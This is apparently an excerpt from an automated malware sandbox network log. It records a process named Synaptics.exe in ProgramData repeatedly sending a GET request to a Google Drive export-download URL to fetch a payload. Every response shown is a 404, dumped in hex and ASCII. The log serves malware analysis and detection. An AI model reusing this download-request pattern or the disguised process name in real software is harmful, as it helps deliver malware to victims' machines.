                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-n8v0QnryHnqNY2j1txrTmw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:28 UTC1INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 79 44 44 39 54 4c 57 47 6e 78 6c 4f 50 65 2f 4d 39 37 65 33 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="TyDD9TLWGnxlOPe/M97e3A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:28 UTC3INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:28 UTC6INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        1192.168.2.349733142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:28 UTC0OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:28 UTC3INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:28 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-SZ0jXQq1bDEPshgGCV6qIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:28 UTC4INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 51 30 4f 45 79 57 50 54 72 31 4d 47 66 72 31 41 68 6c 79 74 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GQ0OEyWPTr1MGfr1AhlytQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:28 UTC6INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:28 UTC6INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        10192.168.2.349745142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:30 UTC28OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:30 UTC31INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:30 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-CRUv/+9L5C5IdnzQBSEETg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:30 UTC32INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:30 UTC32INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 35 74 73 58 79 74 6c 77 73 59 30 75 41 2f 55 6d 62 70 6f 6c 78 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5tsXytlwsY0uA/Umbpolxg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:30 UTC34INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:30 UTC34INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        100192.168.2.349855142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:42 UTC303OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:42 UTC306INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:42 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-uXoaedHmkFa4hQoR5eUtZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:42 UTC308INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 79 48 2b 42 6f 5a 64 63 6e 4e 67 45 58 64 70 4e 49 61 31 31 34 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="yH+BoZdcnNgEXdpNIa114g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:42 UTC309INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:42 UTC309INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        101192.168.2.349856142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:42 UTC306OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:42 UTC309INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:42 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-EMIjm2E+huNAWOdNW+IrLg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:42 UTC311INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:42 UTC311INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 35 6b 39 68 4b 61 57 2f 42 79 33 72 50 55 34 61 69 44 41 68 47 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5k9hKaW/By3rPU4aiDAhGA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:42 UTC312INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:42 UTC312INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        102192.168.2.349857142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:42 UTC309OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:42 UTC312INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:42 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-FYWP0dNavBVsdFEddryHMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:42 UTC314INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
